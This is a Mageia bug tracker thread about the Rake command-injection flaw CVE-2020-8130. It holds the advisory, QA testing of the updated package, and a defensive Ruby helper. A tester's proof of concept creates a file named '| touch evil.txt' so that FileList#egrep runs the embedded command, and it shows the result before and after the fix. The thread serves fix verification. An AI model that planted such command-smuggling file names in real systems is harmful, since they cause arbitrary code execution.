Debian-LTS has issued an advisory on February 26: https://www.debian.org/lts/security/2020/dla-2120 The issue is fixed upstream in 12.3.3. Mageia 7 is also affected.
Status comment: (none) => Fixed upstream in 12.3.3
Whiteboard: (none) => MGA7TOO
No registered nor recent maintainer, so assigning globally.
Assignee: bugsquad => pkg-bugs
CC: (none) => nicolas.salguero
Assignee: pkg-bugs => pterjan
Source RPM: ruby-rake-12.3.0-22.mga8.src.rpm => ruby-2.7.0-26.mga8.src.rpm
ruby 2.7.0 contains 13.0.1, so it is fine in cauldron. I will update ruby-rake in 7.
Version: Cauldron => 7
Packages have been uploaded to 7/core/updates_testing:

ruby-rake-12.3.0-21.mga7.src.rpm
ruby-rake-12.3.0-21.mga7.noarch.rpm

A simple exploit is available on https://hackerone.com/reports/651518
Advisory:
========================

Updated ruby-rake package fixes security vulnerability:

There is an OS command injection vulnerability in Rake < 12.3.3 in Rake::FileList when supplying a filename that begins with the pipe character `|` (CVE-2020-8130).

References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8130
https://www.debian.org/lts/security/2020/dla-2120
Source RPM: ruby-2.7.0-26.mga8.src.rpm => ruby-rake-12.3.0-20.mga7.src.rpm
CC: (none) => pterjan
Status comment: Fixed upstream in 12.3.3 => (none)
Assignee: pterjan => qa-bugs
Whiteboard: MGA7TOO => (none)
mga7, x86_64

CVE-2020-8130
https://hackerone.com/reports/651518

$ cat poc_rake.rb
#!/bin/ruby
require 'rake'
list = Rake::FileList.new( Dir.glob( '*' ) )
p list
list.egrep( /something/ )

$ touch "| touch evil.txt"
$ ls -1
poc_rake.rb
report.26266
'| touch evil.txt'

For this test I left out the bundling stuff because I have no real idea about enabling it. The script should work without it AFAICS.

$ ruby poc_rake.rb
["#report.26266#", "| touch evil.txt", "report.26266", "poc_rake.rb"]
#report.26266#:10:list.egrep( /something/ )
report.26266:10:list.egrep( /something/ )
poc_rake.rb:6:list.egrep( /something/ )
$ ls -1
evil.txt
poc_rake.rb
'#report.26266#'
report.26266
'| touch evil.txt'

So evil.txt has been created.

Updated the package and tested the exploit again.

$ rm -f evil.txt
$ ruby poc_rake.rb
["#report.26266#", "| touch evil.txt", "report.26266", "poc_rake.rb"]
#report.26266#:10:list.egrep( /something/ )
#report.26266#:21:#report.26266#:10:list.egrep( /something/ )
#report.26266#:22:report.26266:10:list.egrep( /something/ )
#report.26266#:23:poc_rake.rb:6:list.egrep( /something/ )
report.26266:10:list.egrep( /something/ )
poc_rake.rb:6:list.egrep( /something/ )
$ ls -1
poc_rake.rb
'#report.26266#'
report.26266
'| touch evil.txt'

No more evil.txt.

Copied files from /usr/share/gems/gems/rake-12.3.0/doc/example/ to a local directory and ran rake against Rakefile2.
$ cat Rakefile2
# Example Rakefile -*- ruby -*-
# Using the power of Ruby

task :default => [:main]

def ext(fn, newext)
  fn.sub(/\.[^.]+$/, newext)
end

SRCFILES = Dir['*.c']
OBJFILES = SRCFILES.collect { |fn| ext(fn,".o") }

OBJFILES.each do |objfile|
  srcfile = ext(objfile, ".c")
  file objfile => [srcfile] do |t|
    sh "gcc #{srcfile} -c -o #{t.name}"
  end
end

file "main" => OBJFILES do |t|
  sh "gcc -o #{t.name} main.o a.o b.o"
end

task :clean do
  rm_f FileList['*.o']
  Dir['*~'].each { |fn| rm_f fn }
end

task :clobber => [:clean] do
  rm_f "main"
end

task :run => ["main"] do
  sh "./main"
end

$ cp Rakefile2 Rakefile
$ rake clean
rm -f
$ rake run
gcc a.c -c -o a.o
gcc main.c -c -o main.o
gcc b.c -c -o b.o
gcc -o main main.o a.o b.o
./main
In function a
In function b
$ ls
a.c  b.o     main.o       Rakefile1  report.26266
a.o  main*   poc_rake.rb  Rakefile2  '| touch evil.txt'
b.c  main.c  Rakefile     '#report.26266#'
$ ./main
In function a
In function b
$ rake clean
rm -f a.o b.o main.o

ruby-rake can do a lot more but this shows that the basic functions work.
CC: (none) => tarazed25
Whiteboard: (none) => MGA7-64-OK
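Added example (my own Ruby, not code from this report or from rake itself) illustrating the advisory above and the PoC test: the upstream fix for CVE-2020-8130 replaced Kernel#open with File.open in FileList#egrep, because Kernel#open treats a name beginning with `|` as a command to run while File.open never does. The helper below applies that pattern and additionally rejects such names up front, reporting them so a caller can log them; safe_file?, safe_egrep and demo are names I chose, and the scratch directory contents are constructed for the demo.

```ruby
require "tmpdir"
require "fileutils"

# Reject any name Kernel#open would treat as a pipe, and anything that is
# not a regular file, before it gets near an open call.
def safe_file?(path)
  base = File.basename(path)
  return false if base.start_with?("|")
  File.file?(path)
end

# Search pattern in the given paths. Returns [matches, skipped] where
# matches is an array of [path, lineno, line] and skipped lists the names
# that were refused, so they can be logged instead of silently dropped.
def safe_egrep(paths, pattern)
  matches = []
  skipped = []
  paths.each do |path|
    unless safe_file?(path)
      skipped << path
      next
    end
    # File.open only ever opens a file; no name can make it spawn a process.
    File.open(path, "r") do |io|
      io.each_line.with_index(1) do |line, n|
        matches << [path, n, line.chomp] if line =~ pattern
      end
    end
  end
  [matches, skipped]
end

# Constructed demo: a scratch directory with one ordinary file and one file
# whose name starts with a pipe, like the one in the PoC in this report.
def demo
  Dir.mktmpdir do |dir|
    Dir.chdir(dir) do
      File.write("notes.rb", "x = 1\nlist.egrep(/something/)\n")
      FileUtils.touch("| touch evil.txt")
      matches, skipped = safe_egrep(Dir.glob("*"), /something/)
      # Third element: whether anything got executed (evil.txt must not exist).
      [matches, skipped, File.exist?("evil.txt")]
    end
  end
end
```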
Could this be applied to political campaigns? Eliminating "evil.txt" there would be a Good Thing. For everybody. Validating. Advisory in Comment 4.
CC: (none) => andrewsfarm, sysadmin-bugs
Keywords: (none) => validated_update
Keywords: (none) => advisory
CC: (none) => tmb
An update for this issue has been pushed to the Mageia Updates repository. https://advisories.mageia.org/MGASA-2020-0121.html
Status: NEW => RESOLVED
Resolution: (none) => FIXED